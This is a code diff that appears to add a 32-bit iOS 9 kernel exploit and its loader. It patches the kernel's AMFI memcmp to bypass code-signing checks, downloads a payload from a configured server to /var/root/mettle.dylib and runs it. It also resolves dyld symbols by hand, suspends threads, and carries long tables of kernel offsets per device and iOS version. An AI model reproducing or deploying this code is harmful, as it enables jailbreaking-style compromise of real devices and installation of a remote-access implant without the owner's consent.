+      uint32_t instruction2 = *(uint32_t*)((uint32_t)kdata + amfi_memcmp_stub+4);
+      uint32_t ip_offset = amfi_memcmp_off - (amfi_memcmp_stub + 12);
+      /*if (amfi_memcmp_stub == 0x776be8) {*/
+        /*debug_print("found stub %p %p %p %p\n", (void*)amfi_memcmp_stub, (void*)(ip_offset), (void*)instruction1, (void*)instruction2);*/
+      /*}*/
+
+      if (insn_is_32bit((uint16_t*)&instruction1) &&
+          insn_is_32bit((uint16_t*)&instruction2) &&
+          (bit_range(instruction1, 28, 24) == 0xc) && // r12
+          (bit_range(instruction2, 28, 24) == 0xc) && // r12
+          (decode_immed(instruction1) == (ip_offset & 0xffff)) &&
+          (decode_immed(instruction2) == (ip_offset >> 16)) &&
+          1) {
+        debug_print("good stub %p %p %p %p\n", (void*)amfi_memcmp_stub, (void*)(ip_offset), (void*)instruction1, (void*)instruction2);
+        amfi_memcmp_stub_found = amfi_memcmp_stub;
+        break;
+      }
+    }
+  }
+
+  free_func(kdata);
+
+  if (amfi_memcmp_stub_found) {
+    uint32_t amfi_memcmp = amfi_memcmp_stub_found + kernel_start;
+    debug_print("amfi memcmp is %p\n", (void*)(amfi_memcmp));
+
+    /*[> fixes amfid[193] <Error>: /private/var/root/log.dylib not valid: 0xe800801c: No code signature found.<]*/
+    write_primitive(amfi_memcmp, 0x47702000); // mov r0, #0; bx lr
+  }
+
+  const char config_placeholder[1024] = "PAYLOAD_URL";
+  const char *payload_file = "/var/root/mettle.dylib";
+
+  // Load the payload from server
+  debug_print("%s\n", "Connecting...");
+  int sockfd = 0;
+  struct sockaddr_in serv_addr;
+  const char *getpayload = "GET /payload32 HTTP/1.1\r\n\r\n";
+  const int chunk_size = 4096;
+  char* payload_buffer = malloc_func(chunk_size);
+  if ((sockfd = socket_func(AF_INET, SOCK_STREAM, 0)) < 0) {
+    debug_print("%s\n", "Could not connect socket");
+    return;
+  }
+
+  serv_addr.sin_family = AF_INET;
+  serv_addr.sin_addr.s_addr = *(uint32_t*)config_placeholder;
+  serv_addr.sin_port = *(uint16_t*)(config_placeholder + 4);
+  debug_print("Connecting: %p p %hu\n", (void*)*(uint32_t*)&serv_addr.sin_addr, serv_addr.sin_port);
+
+  if (connect_func(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
+    debug_print("%s\n", "Could not connect");
+    return;
+  }
+  send_func(sockfd, getpayload, strlen_func(getpayload), 0);
+
+  unlink_func(payload_file);
+  int payloadfd = open_func(payload_file, O_WRONLY | O_CREAT, 0700);
+  int read_header = 0;
+  int n;
+  while ((n = read_func(sockfd, payload_buffer, chunk_size)) > 0) {
+    if (!read_header) {
+      char * payload_start = (char*)boyermoore_horspool_memmem((unsigned char*)payload_buffer, chunk_size, (unsigned char*)"\xce\xfa\xed\xfe", 4);
+      write_func(payloadfd, payload_start, n - (payload_start - payload_buffer));
+      read_header = 1;
+    } else {
+      write_func(payloadfd, payload_buffer, n);
+    }
+  }
+
+  close_func(payloadfd);
+  close_func(sockfd);
+  free_func(payload_buffer);
+
+  // Launch the payload
+  void* libmettle = dlopen_func(payload_file, RTLD_NOW);
+  debug_print("mettle found %p\n", (void*)(libmettle));
+  typedef int (*main_ptr)(int argc, const char *argv[]);
+  main_ptr main_func = dlsym_func(libmettle, "main");
+  const char * progname = "mettle";
+  const char * arg1 = "-u";
+  const char * arg2 = config_placeholder+6;
+  const char *argv[] = { progname, arg1, arg2, NULL };
+  debug_print("main %p\n", main_func);
+  int mainret = main_func(3, argv);
+  debug_print("main finished %d\n", mainret);
+
+}
+
+
@@ -0,0 +1,241 @@
+#include <stdio.h>
+#include <string.h>
+
+#include <mach-o/loader.h>
+#include <mach-o/nlist.h>
+#include <mach-o/dyld.h>
+#include <mach/mach.h>
+
+#include <dlfcn.h>
+#include <asl.h>
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include <sys/mman.h>
+
+#define DEBUG 1
+
+#if __aarch64__
+typedef struct mach_header_64 mach_header_t;
+typedef struct segment_command_64 segment_command_t;
+typedef struct section_64 section_t;
+typedef struct nlist_64 nlist_t;
+#define MH_MAGIC_T MH_MAGIC_64
+#define LC_SEGMENT_T LC_SEGMENT_64
+#else
+typedef struct mach_header mach_header_t;
+typedef struct segment_command segment_command_t;
+typedef struct section section_t;
+typedef struct nlist nlist_t;
+#define MH_MAGIC_T MH_MAGIC
+#define LC_SEGMENT_T LC_SEGMENT
+#endif
+
+//https://github.com/opensource-apple/dyld/blob/master/configs/dyld.xcconfig - iOS 9.3.4
+#ifdef __x86_64
+#define DYLD_BASE_ADDRESS 0x7fff5fc00000
+#elif __arm64
+#define DYLD_BASE_ADDRESS 0x120000000
+#elif __arm
+#define DYLD_BASE_ADDRESS 0x1fe00000
+#else
+#endif
+
+int string_compare(const char* s1, const char* s2);
+long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6);
+void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer);
+uint64_t syscall_chmod(uint64_t path, long mode);
+uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
+void init_exploit(void * dlsym_addr, void * dlopen_addr);
+void init_main();
+void init();
+
+int main() 
+{
+  init();
+}
+
+void init()
+{
+  void* dlopen_addr = 0;
+  void* dlsym_addr = 0;
+
+  uint64_t start = DYLD_BASE_ADDRESS;
+  /*if (sierra) {*/
+  /*}*/
+  uint64_t dyld = find_macho(start, 0x1000, 0);
+
+  resolve_dyld_symbol((void*)dyld, &dlopen_addr, &dlsym_addr);
+
+  typedef void* (*dlopen_ptr)(const char *filename, int flags);
+  typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
+  dlopen_ptr dlopen_func = dlopen_addr;
+  dlsym_ptr dlsym_func = dlsym_addr;
+  void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
+
+  // Suspend threads
+  typedef mach_port_t (*mach_task_self_ptr)();
+  typedef thread_port_t (*mach_thread_self_ptr)();
+  typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
+  typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
+  void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
+  mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
+  mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
+  thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
+  task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
+  thread_act_t current_thread = mach_thread_self_func();
+  mach_msg_type_number_t thread_count;
+  thread_act_array_t thread_list;
+  kern_return_t result = task_threads_func(mach_task_self_func(), (thread_act_array_t)&thread_list, &thread_count);
+  if (!result && thread_count) {
+    for (unsigned int i = 0; i < thread_count; ++i) {
+      thread_act_t other_thread = thread_list[i];
+      if (other_thread != current_thread) {
+        thread_suspend_func(other_thread);
+      }
+    }
+  }
+
+  // Run exploit
+  init_exploit(dlsym_addr, dlopen_addr);
+
+}
+
+uint64_t syscall_chmod(uint64_t path, long mode)
+{
+  return asm_syscall(15, path, mode, 0, 0, 0, 0);
+}
+
+long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6){
+  long ret;
+#ifdef __x86_64
+  asm volatile (
+      "movq %1, %%rax\n\t"
+      "movq %2, %%rdi\n\t"
+      "movq %3, %%rsi\n\t"
+      "movq %4, %%rdx\n\t"
+      "movq %5, %%rcx\n\t"
+      "movq %6, %%r8\n\t"
+      "movq %7, %%r9\n\t"
+      "syscall"
+      : "=a"(ret)
+      : "g"(syscall_number), "g"(arg1), "g"(arg2), "g"(arg3), "g"(arg4), "g"(arg5), "g"(arg6)    );
+#elif __arm__
+  volatile register uint32_t r12 asm("r12") = syscall_number;
+  volatile register uint32_t r0 asm("r0") = arg1;
+  volatile register uint32_t r1 asm("r1") = arg2;
+  volatile register uint32_t r2 asm("r2") = arg3;
+  volatile register uint32_t r3 asm("r3") = arg4;
+  volatile register uint32_t r4 asm("r4") = arg5;
+  volatile register uint32_t r5 asm("r5") = arg6;
+  volatile register uint32_t xret asm("r0");
+  asm volatile (
+      "mov r0, %2\n"
+      "mov r1, %3\n"
+      "mov r2, %4\n"
+      "mov r3, %5\n"
+      "mov r4, %6\n"
+      "mov r5, %7\n"
+      "mov r12, %1\n"
+      "swi 0x80\n"
+      "mov %0, r0\n"
+      : "=r"(xret)
+      : "r"(r12), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5)
+      : "r0", "r1", "r2", "r3", "r4", "r5", "r12");
+  ret = xret;
+#elif __aarch64__
+  // : ¯\_(ツ)_/¯
+	volatile register uint64_t x16 asm("x16") = syscall_number;
+	volatile register uint64_t x0 asm("x0") = arg1;
+	volatile register uint64_t x1 asm("x1") = arg2;
+	volatile register uint64_t x2 asm("x2") = arg3;
+	volatile register uint64_t x3 asm("x3") = arg4;
+	volatile register uint64_t x4 asm("x4") = arg5;
+	volatile register uint64_t x5 asm("x5") = arg6;
+	volatile register uint64_t xret asm("x0");
+  asm volatile (
+      "mov x0, %2\n\t"
+      "mov x1, %3\n\t"
+      "mov x2, %4\n\t"
+      "mov x3, %5\n\t"
+      "mov x4, %6\n\t"
+      "mov x5, %7\n\t"
+      "mov x16, %1\n\t"
+      "svc 0x80\n\t"
+      "mov %0, x0\n\t"
+      : "=r"(xret)
+      : "r"(x16), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
+      : "x0", "x1", "x2", "x3", "x4", "x5", "x16");
+  ret = xret;
+#endif
+  return ret;
+}
+
+int string_compare(const char* s1, const char* s2) 
+{
+  while (*s1 != '\0' && *s1 == *s2)
+  {
+    s1++;
+    s2++;
+  }
+  return (*(unsigned char *) s1) - (*(unsigned char *) s2);
+}
+
+uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer) 
+{
+  while(1) {
+    uint64_t ptr = addr;
+    if (pointer) {
+      ptr = *(uint64_t *)ptr;
+    }
+    unsigned long ret = syscall_chmod(ptr, 0777);
+    if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_T) {
+      return ptr;
+    }
+
+    addr += increment;
+  }
+  return 0;
+}
+
+// Credits: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
+void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer)
+{
+  struct load_command* lc;
+  segment_command_t* sc;
+  segment_command_t* data;
+  section_t* data_const = 0;
+  lc = (struct load_command*)(base + sizeof(mach_header_t));
+
+  for (int i=0;i<((mach_header_t*)base)->ncmds; i++) {
+    if (lc->cmd == LC_SEGMENT_T) {
+      sc = (struct segment_command*)lc;
+      if (string_compare(sc->segname, "__DATA") == 0) {
+        data = (struct segment_command*)lc;
+        break;
+      }
+    }
+    lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
+  }
+  data_const = (section_t*)(data + 1);
+  for (int i=0; i<data->nsects; i++,data_const++) {
+    if (string_compare(data_const->sectname, "__const") == 0) {
+      break;
+    }
+  }
+  void **dataConst = base + data_const->offset;
+
+  while (!*dlopen_pointer || !*dlsym_pointer) {
+    if (string_compare((char*)(dataConst[0]), "__dyld_dlopen") == 0) {
+      *dlopen_pointer = (void*)dataConst[1];
+    }
+    if (string_compare((char*)(dataConst[0]), "__dyld_dlsym") == 0) {
+      *dlsym_pointer = (void*)dataConst[1];
+    }
+    dataConst += 2;
+  }
+}
+
+#include "exploit32.c"
+
@@ -0,0 +1,2944 @@
+
+#define determineTarget(modelIdentifier, swVers, target) if (!string_compare(device_model, modelIdentifier)) { if (!string_compare(system_version, swVers)) { return target; }}
+
+typedef enum {
+    NotSupported,
+    iPhone41_iOS902,
+    iPhone41_iOS910,
+    iPhone41_iOS920,
+    iPhone41_iOS921,
+    iPhone41_iOS930,
+    iPhone41_iOS931,
+    iPhone41_iOS932,
+    iPhone41_iOS933,
+    iPhone41_iOS934,
+    iPhone51_iOS910,
+    iPhone51_iOS920,
+    iPhone51_iOS921,
+    iPhone51_iOS930,
+    iPhone51_iOS931,
+    iPhone51_iOS932,
+    iPhone51_iOS933,
+    iPhone51_iOS934,
+    iPhone52_iOS902,
+    iPhone52_iOS910,
+    iPhone52_iOS920,
+    iPhone52_iOS921,
+    iPhone52_iOS930,
+    iPhone52_iOS931,
+    iPhone52_iOS932,
+    iPhone52_iOS933,
+    iPhone52_iOS934,
+    iPhone53_iOS910,
+    iPhone53_iOS920,
+    iPhone53_iOS921,
+    iPhone53_iOS930,
+    iPhone53_iOS931,
+    iPhone53_iOS932,
+    iPhone53_iOS933,
+    iPhone53_iOS934,
+    iPhone54_iOS910,
+    iPhone54_iOS920,
+    iPhone54_iOS921,
+    iPhone54_iOS930,
+    iPhone54_iOS931,
+    iPhone54_iOS932,
+    iPhone54_iOS933,
+    iPhone54_iOS934,
+    iPad21_iOS910,
+    iPad21_iOS920,
+    iPad21_iOS921,
+    iPad21_iOS930,
+    iPad21_iOS931,
+    iPad21_iOS932,
+    iPad21_iOS933,
+    iPad21_iOS934,
+    iPad22_iOS910,
+    iPad22_iOS920,
+    iPad22_iOS921,
+    iPad22_iOS930,
+    iPad22_iOS931,
+    iPad22_iOS932,
+    iPad22_iOS933,
+    iPad22_iOS934,
+    iPad23_iOS910,
+    iPad23_iOS920,
+    iPad23_iOS921,
+    iPad23_iOS930,
+    iPad23_iOS931,
+    iPad23_iOS932,
+    iPad23_iOS933,
+    iPad23_iOS934,
+    iPad24_iOS910,
+    iPad24_iOS920,
+    iPad24_iOS921,
+    iPad24_iOS930,
+    iPad24_iOS931,
+    iPad24_iOS932,
+    iPad24_iOS933,
+    iPad24_iOS934,
+    iPad25_iOS902,
+    iPad25_iOS910,
+    iPad25_iOS920,
+    iPad25_iOS921,
+    iPad25_iOS930,
+    iPad25_iOS931,
+    iPad25_iOS932,
+    iPad25_iOS933,
+    iPad25_iOS934,
+    iPad26_iOS910,
+    iPad26_iOS920,
+    iPad26_iOS921,
+    iPad26_iOS930,
+    iPad26_iOS931,
+    iPad26_iOS932,
+    iPad26_iOS933,
+    iPad26_iOS934,
+    iPad27_iOS910,
+    iPad27_iOS920,
+    iPad27_iOS921,
+    iPad27_iOS930,
+    iPad27_iOS931,
+    iPad27_iOS932,
+    iPad27_iOS933,
+    iPad27_iOS934,
+    iPad31_iOS910,
+    iPad31_iOS920,
+    iPad31_iOS921,
+    iPad31_iOS930,
+    iPad31_iOS931,
+    iPad31_iOS932,
+    iPad31_iOS933,
+    iPad31_iOS934,
+    iPad32_iOS910,
+    iPad32_iOS920,
+    iPad32_iOS921,
+    iPad32_iOS930,
+    iPad32_iOS931,
+    iPad32_iOS932,
+    iPad32_iOS933,
+    iPad32_iOS934,
+    iPad33_iOS902,
+    iPad33_iOS910,
+    iPad33_iOS920,
+    iPad33_iOS921,
+    iPad33_iOS930,
+    iPad33_iOS931,
+    iPad33_iOS932,
+    iPad33_iOS933,
+    iPad33_iOS934,
+    iPad34_iOS910,
+    iPad34_iOS920,
+    iPad34_iOS921,
+    iPad34_iOS930,
+    iPad34_iOS931,
+    iPad34_iOS932,
+    iPad34_iOS933,
+    iPad34_iOS934,
+    iPad35_iOS910,
+    iPad35_iOS920,
+    iPad35_iOS921,
+    iPad35_iOS930,
+    iPad35_iOS931,
+    iPad35_iOS932,
+    iPad35_iOS933,
+    iPad35_iOS934,
+    iPad36_iOS910,
+    iPad36_iOS920,
+    iPad36_iOS921,
+    iPad36_iOS930,
+    iPad36_iOS931,
+    iPad36_iOS932,
+    iPad36_iOS933,
+    iPad36_iOS934,
+    iPod51_iOS910,
+    iPod51_iOS920,
+    iPod51_iOS921,
+    iPod51_iOS930,
+    iPod51_iOS931,
+    iPod51_iOS932,
+    iPod51_iOS933,
+    iPod51_iOS934
+} t_target_environment;
+
+static t_target_environment target_environment;
+
+t_target_environment info_to_target_environment(const char *device_model, const char *system_version) {
+    determineTarget("iPhone4,1", "9.0.2", iPhone41_iOS902);
+    determineTarget("iPhone4,1", "9.1", iPhone41_iOS910);
+    determineTarget("iPhone4,1", "9.2", iPhone41_iOS920);
+    determineTarget("iPhone4,1", "9.2.1", iPhone41_iOS921);
+    determineTarget("iPhone4,1", "9.3", iPhone41_iOS930);
+    determineTarget("iPhone4,1", "9.3.1", iPhone41_iOS931);
+    determineTarget("iPhone4,1", "9.3.2", iPhone41_iOS932);
+    determineTarget("iPhone4,1", "9.3.3", iPhone41_iOS933);
+    determineTarget("iPhone4,1", "9.3.4", iPhone41_iOS934);
+    determineTarget("iPhone5,1", "9.1", iPhone51_iOS910);
+    determineTarget("iPhone5,1", "9.2", iPhone51_iOS920);
+    determineTarget("iPhone5,1", "9.2.1", iPhone51_iOS921);
+    determineTarget("iPhone5,1", "9.3", iPhone51_iOS930);
+    determineTarget("iPhone5,1", "9.3.1", iPhone51_iOS931);
+    determineTarget("iPhone5,1", "9.3.2", iPhone51_iOS932);
+    determineTarget("iPhone5,1", "9.3.3", iPhone51_iOS933);
+    determineTarget("iPhone5,1", "9.3.4", iPhone51_iOS934);
+    determineTarget("iPhone5,2", "9.0.2", iPhone52_iOS902);
+    determineTarget("iPhone5,2", "9.1", iPhone52_iOS910);
+    determineTarget("iPhone5,2", "9.2", iPhone52_iOS920);
+    determineTarget("iPhone5,2", "9.2.1", iPhone52_iOS921);
+    determineTarget("iPhone5,2", "9.3", iPhone52_iOS930);
+    determineTarget("iPhone5,2", "9.3.1", iPhone52_iOS931);
+    determineTarget("iPhone5,2", "9.3.2", iPhone52_iOS932);
+    determineTarget("iPhone5,2", "9.3.3", iPhone52_iOS933);
+    determineTarget("iPhone5,2", "9.3.4", iPhone52_iOS934);
+    determineTarget("iPhone5,3", "9.1", iPhone53_iOS910);
+    determineTarget("iPhone5,3", "9.2", iPhone53_iOS920);
+    determineTarget("iPhone5,3", "9.2.1", iPhone53_iOS921);
+    determineTarget("iPhone5,3", "9.3", iPhone53_iOS930);
+    determineTarget("iPhone5,3", "9.3.1", iPhone53_iOS931);
+    determineTarget("iPhone5,3", "9.3.2", iPhone53_iOS932);
+    determineTarget("iPhone5,3", "9.3.3", iPhone53_iOS933);
+    determineTarget("iPhone5,3", "9.3.4", iPhone53_iOS934);
+    determineTarget("iPhone5,4", "9.1", iPhone54_iOS910);
+    determineTarget("iPhone5,4", "9.2", iPhone54_iOS920);
+    determineTarget("iPhone5,4", "9.2.1", iPhone54_iOS921);
+    determineTarget("iPhone5,4", "9.3", iPhone54_iOS930);
+    determineTarget("iPhone5,4", "9.3.1", iPhone54_iOS931);
+    determineTarget("iPhone5,4", "9.3.2", iPhone54_iOS932);
+    determineTarget("iPhone5,4", "9.3.3", iPhone54_iOS933);
+    determineTarget("iPhone5,4", "9.3.4", iPhone54_iOS934);
+    determineTarget("iPad2,1", "9.1", iPad21_iOS910);
+    determineTarget("iPad2,1", "9.2", iPad21_iOS920);
+    determineTarget("iPad2,1", "9.2.1", iPad21_iOS921);
+    determineTarget("iPad2,1", "9.3", iPad21_iOS930);
+    determineTarget("iPad2,1", "9.3.1", iPad21_iOS931);
+    determineTarget("iPad2,1", "9.3.2", iPad21_iOS932);
+    determineTarget("iPad2,1", "9.3.3", iPad21_iOS933);
+    determineTarget("iPad2,1", "9.3.4", iPad21_iOS934);
+    determineTarget("iPad2,2", "9.1", iPad22_iOS910);
+    determineTarget("iPad2,2", "9.2", iPad22_iOS920);
+    determineTarget("iPad2,2", "9.2.1", iPad22_iOS921);
+    determineTarget("iPad2,2", "9.3", iPad22_iOS930);
+    determineTarget("iPad2,2", "9.3.1", iPad22_iOS931);
+    determineTarget("iPad2,2", "9.3.2", iPad22_iOS932);
+    determineTarget("iPad2,2", "9.3.3", iPad22_iOS933);
+    determineTarget("iPad2,2", "9.3.4", iPad22_iOS934);
+    determineTarget("iPad2,3", "9.1", iPad23_iOS910);
+    determineTarget("iPad2,3", "9.2", iPad23_iOS920);
+    determineTarget("iPad2,3", "9.2.1", iPad23_iOS921);
+    determineTarget("iPad2,3", "9.3.0", iPad23_iOS930);
+    determineTarget("iPad2,3", "9.3.1", iPad23_iOS931);
+    determineTarget("iPad2,3", "9.3.2", iPad23_iOS920);
+    determineTarget("iPad2,3", "9.3.3", iPad23_iOS933);
+    determineTarget("iPad2,3", "9.3.4", iPad23_iOS934);
+    determineTarget("iPad2,4", "9.1", iPad24_iOS910);
+    determineTarget("iPad2,4", "9.2", iPad24_iOS920);
+    determineTarget("iPad2,4", "9.2.1", iPad24_iOS921);
+    determineTarget("iPad2,4", "9.3.0", iPad24_iOS930);
+    determineTarget("iPad2,4", "9.3.1", iPad24_iOS931);
+    determineTarget("iPad2,4", "9.3.2", iPad24_iOS920);
+    determineTarget("iPad2,4", "9.3.3", iPad24_iOS933);
+    determineTarget("iPad2,4", "9.3.4", iPad24_iOS934);
+    determineTarget("iPad2,5", "9.0.2", iPad25_iOS902);
+    determineTarget("iPad2,5", "9.1", iPad25_iOS910);
+    determineTarget("iPad2,5", "9.2", iPad25_iOS920);
+    determineTarget("iPad2,5", "9.2.1", iPad25_iOS921);
+    determineTarget("iPad2,5", "9.3", iPad25_iOS930);
+    determineTarget("iPad2,5", "9.3.1", iPad25_iOS931);
+    determineTarget("iPad2,5", "9.3.2", iPad25_iOS932);
+    determineTarget("iPad2,5", "9.3.3", iPad25_iOS933);
+    determineTarget("iPad2,5", "9.3.4", iPad25_iOS934);
+    determineTarget("iPad2,6", "9.1", iPad26_iOS910);
+    determineTarget("iPad2,6", "9.2", iPad26_iOS920);
+    determineTarget("iPad2,6", "9.2.1", iPad26_iOS921);
+    determineTarget("iPad2,6", "9.3", iPad26_iOS930);
+    determineTarget("iPad2,6", "9.3.1", iPad26_iOS931);
+    determineTarget("iPad2,6", "9.3.2", iPad26_iOS932);
+    determineTarget("iPad2,6", "9.3.3", iPad26_iOS933);
+    determineTarget("iPad2,6", "9.3.4", iPad26_iOS934);
+    determineTarget("iPad2,7", "9.1", iPad27_iOS910);
+    determineTarget("iPad2,7", "9.2", iPad27_iOS920);
+    determineTarget("iPad2,7", "9.2.1", iPad27_iOS921);
+    determineTarget("iPad2,7", "9.3", iPad27_iOS930);
+    determineTarget("iPad2,7", "9.3.1", iPad27_iOS931);
+    determineTarget("iPad2,7", "9.3.2", iPad27_iOS932);
+    determineTarget("iPad2,7", "9.3.3", iPad27_iOS933);
+    determineTarget("iPad2,7", "9.3.4", iPad27_iOS934);
+    determineTarget("iPad3,1", "9.1", iPad31_iOS910);
+    determineTarget("iPad3,1", "9.2", iPad31_iOS920);
+    determineTarget("iPad3,1", "9.2.1", iPad31_iOS921);
+    determineTarget("iPad3,1", "9.3.0", iPad31_iOS930);
+    determineTarget("iPad3,1", "9.3.1", iPad31_iOS931);
+    determineTarget("iPad3,1", "9.3.2", iPad31_iOS932);
+    determineTarget("iPad3,1", "9.3.3", iPad31_iOS933);
+    determineTarget("iPad3,1", "9.3.4", iPad31_iOS934);
+    determineTarget("iPad3,2", "9.1", iPad32_iOS910);
+    determineTarget("iPad3,2", "9.2", iPad32_iOS920);
+    determineTarget("iPad3,2", "9.2.1", iPad32_iOS921);
+    determineTarget("iPad3,2", "9.3.0", iPad32_iOS930);
+    determineTarget("iPad3,2", "9.3.1", iPad32_iOS931);
+    determineTarget("iPad3,2", "9.3.2", iPad32_iOS932);
+    determineTarget("iPad3,2", "9.3.3", iPad32_iOS933);
+    determineTarget("iPad3,2", "9.3.4", iPad32_iOS934);
+    determineTarget("iPad3,3", "9.0.2", iPad33_iOS902);
+    determineTarget("iPad3,3", "9.1", iPad33_iOS910);
+    determineTarget("iPad3,3", "9.2", iPad33_iOS920);
+    determineTarget("iPad3,3", "9.2.1", iPad33_iOS921);
+    determineTarget("iPad3,3", "9.3", iPad33_iOS930);
+    determineTarget("iPad3,3", "9.3.1", iPad33_iOS931);
+    determineTarget("iPad3,3", "9.3.2", iPad33_iOS932);
+    determineTarget("iPad3,3", "9.3.3", iPad33_iOS933);
+    determineTarget("iPad3,3", "9.3.4", iPad33_iOS934);
+    determineTarget("iPad3,4", "9.1", iPad34_iOS910);
+    determineTarget("iPad3,4", "9.2", iPad34_iOS920);
+    determineTarget("iPad3,4", "9.2.1", iPad34_iOS921);
+    determineTarget("iPad3,4", "9.3", iPad34_iOS930);
+    determineTarget("iPad3,4", "9.3.1", iPad34_iOS931);
+    determineTarget("iPad3,4", "9.3.2", iPad34_iOS932);
+    determineTarget("iPad3,4", "9.3.3", iPad34_iOS933);
+    determineTarget("iPad3,4", "9.3.4", iPad34_iOS934);
+    determineTarget("iPad3,5", "9.1", iPad35_iOS910);
+    determineTarget("iPad3,5", "9.2", iPad35_iOS920);
+    determineTarget("iPad3,5", "9.2.1", iPad35_iOS921);
+    determineTarget("iPad3,5", "9.3", iPad35_iOS930);
+    determineTarget("iPad3,5", "9.3.1", iPad35_iOS931);
+    determineTarget("iPad3,5", "9.3.2", iPad35_iOS932);
+    determineTarget("iPad3,5", "9.3.3", iPad35_iOS933);
+    determineTarget("iPad3,5", "9.3.4", iPad35_iOS934);
+    determineTarget("iPad3,6", "9.1", iPad36_iOS910);
+    determineTarget("iPad3,6", "9.2", iPad36_iOS920);
+    determineTarget("iPad3,6", "9.2.1", iPad36_iOS921);
+    determineTarget("iPad3,6", "9.3", iPad36_iOS930);
+    determineTarget("iPad3,6", "9.3.1", iPad36_iOS931);
+    determineTarget("iPad3,6", "9.3.2", iPad36_iOS932);
+    determineTarget("iPad3,6", "9.3.3", iPad36_iOS933);
+    determineTarget("iPad3,6", "9.3.4", iPad36_iOS934);
+    determineTarget("iPod5,1", "9.1", iPod51_iOS910);
+    determineTarget("iPod5,1", "9.2", iPod51_iOS920);
+    determineTarget("iPod5,1", "9.2.1", iPod51_iOS921);
+    determineTarget("iPod5,1", "9.3", iPod51_iOS930);
+    determineTarget("iPod5,1", "9.3.1", iPod51_iOS931);
+    determineTarget("iPod5,1", "9.3.2", iPod51_iOS932);
+    determineTarget("iPod5,1", "9.3.3", iPod51_iOS933);
+    determineTarget("iPod5,1", "9.3.4", iPod51_iOS934);
+    return 0;
+}
+
+static inline unsigned int find_OSSerializer_serialize(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x317de4;
+        case iPhone41_iOS910: return 0x319450;
+        case iPhone41_iOS920: return 0x3106fc;
+        case iPhone41_iOS921: return 0x3107fc;
+        case iPhone41_iOS930: return 0x31812c;
+        case iPhone41_iOS931: return 0x31812c;
+        case iPhone41_iOS932: return 0x318264;
+        case iPhone41_iOS933: return 0x318388;
+        case iPhone41_iOS934: return 0x318388;
+        case iPhone51_iOS910: return 0x31fd1c;
+        case iPhone51_iOS920: return 0x317768;
+        case iPhone51_iOS921: return 0x317868;
+        case iPhone51_iOS930: return 0x31ef50;
+        case iPhone51_iOS931: return 0x31ef50;
+        case iPhone51_iOS932: return 0x302e3c;
+        case iPhone51_iOS933: return 0x31f13c;
+        case iPhone51_iOS934: return 0x31f13c;
+        case iPhone52_iOS902: return 0x31e7bc;
+        case iPhone52_iOS910: return 0x31fd1c;
+        case iPhone52_iOS920: return 0x317768;
+        case iPhone52_iOS921: return 0x317868;
+        case iPhone52_iOS930: return 0x31ef50;
+        case iPhone52_iOS931: return 0x31ef50;
+        case iPhone52_iOS932: return 0x31ef58;
+        case iPhone52_iOS933: return 0x31f13c;
+        case iPhone52_iOS934: return 0x31f13c;
+        case iPhone53_iOS910: return 0x31fd1c;
+        case iPhone53_iOS920: return 0x317768;
+        case iPhone53_iOS921: return 0x317868;
+        case iPhone53_iOS930: return 0x31ef50;
+        case iPhone53_iOS931: return 0x31ef50;
+        case iPhone53_iOS932: return 0x31ef58;
+        case iPhone53_iOS933: return 0x31f13c;
+        case iPhone53_iOS934: return 0x31f13c;
+        case iPhone54_iOS910: return 0x31fd1c;
+        case iPhone54_iOS920: return 0x317768;
+        case iPhone54_iOS921: return 0x317868;
+        case iPhone54_iOS930: return 0x31ef50;
+        case iPhone54_iOS931: return 0x31ef50;
+        case iPhone54_iOS932: return 0x31ed7c;
+        case iPhone54_iOS933: return 0x31f13c;
+        case iPhone54_iOS934: return 0x31f13c;
+        case iPad21_iOS910: return 0x319450;
+        case iPad21_iOS920: return 0x3106fc;
+        case iPad21_iOS921: return 0x3107fc;
+        case iPad21_iOS930: return 0x31812c;
+        case iPad21_iOS931: return 0x31812c;
+        case iPad21_iOS932: return 0x318264;
+        case iPad21_iOS933: return 0x318388;
+        case iPad21_iOS934: return 0x318388;
+        case iPad22_iOS910: return 0x319450;
+        case iPad22_iOS920: return 0x3106fc;
+        case iPad22_iOS921: return 0x3107fc;
+        case iPad22_iOS930: return 0x31812c;
+        case iPad22_iOS931: return 0x31812c;
+        case iPad22_iOS932: return 0x318264;
+        case iPad22_iOS933: return 0x318388;
+        case iPad22_iOS934: return 0x318388;
+        case iPad23_iOS910: return 0x319450;
+        case iPad23_iOS920: return 0x3106fc;
+        case iPad23_iOS921: return 0x3107fc;
+        case iPad23_iOS930: return 0x31812c;
+        case iPad23_iOS931: return 0x31812c;
+        case iPad23_iOS932: return 0x318264;
+        case iPad23_iOS933: return 0x318388;
+        case iPad23_iOS934: return 0x318388;
+        case iPad24_iOS910: return 0x319450;
+        case iPad24_iOS920: return 0x3106fc;
+        case iPad24_iOS921: return 0x3107fc;
+        case iPad24_iOS930: return 0x31812c;
+        case iPad24_iOS931: return 0x31812c;
+        case iPad24_iOS932: return 0x318264;
+        case iPad24_iOS933: return 0x318388;
+        case iPad24_iOS934: return 0x318388;
